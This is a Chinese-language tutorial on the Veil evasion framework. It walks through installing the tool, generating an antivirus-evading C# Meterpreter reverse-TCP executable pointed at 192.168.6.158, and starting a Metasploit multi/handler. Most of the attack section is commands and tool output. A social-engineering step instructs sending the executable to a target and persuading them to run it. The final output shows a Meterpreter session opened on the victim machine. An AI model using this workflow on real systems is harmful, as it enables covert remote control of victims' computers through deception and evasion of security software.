Veil的使用

0x01 安装

git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
cd setup
sudo ./setup.sh -c

需要安装wine等工具，整个安装过程比较漫长。

0x2 使用

运行Veil

root@kali:~/Downloads/Veil# python3 Veil.py

===============================================================================
                             Veil | [Version]: 3.1.4
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Commands:

	exit			Exit Veil
	info			Information on a specific tool
	list			List available tools
	update			Update Veil
	use			Use a specific tool

Main menu choice:

选择一个工具

===============================================================================
                             Veil | [Version]: 3.1.4
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Commands:

	exit			Exit Veil
	info			Information on a specific tool
	list			List available tools
	update			Update Veil
	use			Use a specific tool

Main menu choice: list

===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Available Tools:

  1)  Evasion
  2)  Ordnance

Main menu choice: use 1

===============================================================================
                             Veil | [Version]: 3.1.4
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Commands:

	exit			Exit Veil
	info			Information on a specific tool
	list			List available tools
	update			Update Veil
	use			Use a specific tool

Main menu choice: list

选择一个payload

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

  1)  autoit/shellcode_inject/flat.py

  2)  auxiliary/coldwar_wrapper.py
  3)  auxiliary/macro_converter.py
  4)  auxiliary/pyinstaller_wrapper.py

  5)  c/meterpreter/rev_http.py
  6)  c/meterpreter/rev_http_service.py
  7)  c/meterpreter/rev_tcp.py
  8)  c/meterpreter/rev_tcp_service.py

  9)  cs/meterpreter/rev_http.py
  10) cs/meterpreter/rev_https.py
  11) cs/meterpreter/rev_tcp.py
  12) cs/shellcode_inject/base64.py
  13) cs/shellcode_inject/virtual.py

  14) go/meterpreter/rev_http.py
  15) go/meterpreter/rev_https.py
  16) go/meterpreter/rev_tcp.py
  17) go/shellcode_inject/virtual.py

  18) lua/shellcode_inject/flat.py

  19) perl/shellcode_inject/flat.py

  20) powershell/meterpreter/rev_http.py
  21) powershell/meterpreter/rev_https.py
  22) powershell/meterpreter/rev_tcp.py
  23) powershell/shellcode_inject/psexec_virtual.py
  24) powershell/shellcode_inject/virtual.py

  25) python/meterpreter/bind_tcp.py
  26) python/meterpreter/rev_http.py
  27) python/meterpreter/rev_https.py
  28) python/meterpreter/rev_tcp.py
  29) python/shellcode_inject/aes_encrypt.py
  30) python/shellcode_inject/arc_encrypt.py
  31) python/shellcode_inject/base64_substitution.py
  32) python/shellcode_inject/des_encrypt.py
  33) python/shellcode_inject/flat.py
  34) python/shellcode_inject/letter_substitution.py
  35) python/shellcode_inject/pidinject.py
  36) python/shellcode_inject/stallion.py

  37) ruby/meterpreter/rev_http.py
  38) ruby/meterpreter/rev_https.py
  39) ruby/meterpreter/rev_tcp.py
  40) ruby/shellcode_inject/base64.py
  41) ruby/shellcode_inject/flat.py

Veil-Evasion command: use 11

配置payload参数

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
DEBUGGER        	X       	Optional: Check if debugger is attached
DOMAIN          	X       	Optional: Required internal domain
EXPIRE_PAYLOAD  	X       	Optional: Payloads expire after "Y" days
HOSTNAME        	X       	Optional: Required system hostname
INJECT_METHOD   	Virtual 	Virtual or Heap
LHOST           	        	IP of the Metasploit handler
LPORT           	4444    	Port of the Metasploit handler
PROCESSORS      	X       	Optional: Minimum number of processors
SLEEP           	X       	Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE        	X       	Optional: Check to validate not in UTC
USERNAME        	X       	Optional: The required user account
USE_ARYA        	N       	Use the Arya crypter

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option

[cs/meterpreter/rev_tcp>>] set LHOST 192.168.6.158

生成攻击代码和exe

[cs/meterpreter/rev_tcp>>] generate

===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: cs
 [*] Payload Module: cs/meterpreter/rev_tcp
 [*] Executable written to: /usr/share/veil-output/compiled/test.exe
 [*] Source code written to: /usr/share/veil-output/source/test.cs
 [*] Metasploit RC file written to: /usr/share/veil-output/handlers/test.rc

Please press enter to continue >:

0x03 攻击实践

编译

可以直接去/usr/share/veil-output/compiled/下获取编译好的exe文件或去/usr/share/veil-output/compiled/获取源文件编译。

源文件，

打开vs2017并新建控制台应用程序，修改源码并编译生成test.exe，

开启MSF

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/x64/
set payload windows/x64/exec                            set payload windows/x64/powershell_reverse_tcp
set payload windows/x64/loadlibrary                     set payload windows/x64/shell/bind_ipv6_tcp
set payload windows/x64/meterpreter/bind_ipv6_tcp       set payload windows/x64/shell/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid  set payload windows/x64/shell/bind_tcp
set payload windows/x64/meterpreter/bind_tcp            set payload windows/x64/shell/bind_tcp_uuid
set payload windows/x64/meterpreter/bind_tcp_uuid       set payload windows/x64/shell/reverse_tcp
set payload windows/x64/meterpreter/reverse_http        set payload windows/x64/shell/reverse_tcp_uuid
set payload windows/x64/meterpreter/reverse_https       set payload windows/x64/shell_bind_tcp
set payload windows/x64/meterpreter/reverse_named_pipe  set payload windows/x64/shell_reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp         set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/x64/meterpreter/reverse_tcp_uuid    set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/reverse_winhttp     set payload windows/x64/vncinject/bind_tcp
set payload windows/x64/meterpreter/reverse_winhttps    set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/x64/meterpreter_bind_tcp            set payload windows/x64/vncinject/reverse_http
set payload windows/x64/meterpreter_reverse_http        set payload windows/x64/vncinject/reverse_https
set payload windows/x64/meterpreter_reverse_https       set payload windows/x64/vncinject/reverse_tcp
set payload windows/x64/meterpreter_reverse_ipv6_tcp    set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/x64/meterpreter_reverse_tcp         set payload windows/x64/vncinject/reverse_winhttp
set payload windows/x64/powershell_bind_tcp             set payload windows/x64/vncinject/reverse_winhttps
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHoST 192.168.6.158
LHoST => 192.168.6.158
msf exploit(multi/handler) > exploit -j

社工

将生成的test.exe发送给目标并让对方运行。

效果

msf exploit(multi/handler) > [*] Sending stage (205891 bytes) to 192.168.8.10
[*] Meterpreter session 1 opened (192.168.6.158:4444 -> 192.168.8.10:20693) at 2017-12-25 21:40:11 -0500

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x64/windows               192.168.6.158:4444 -> 192.168.8.10:20693 (192.168.8.10)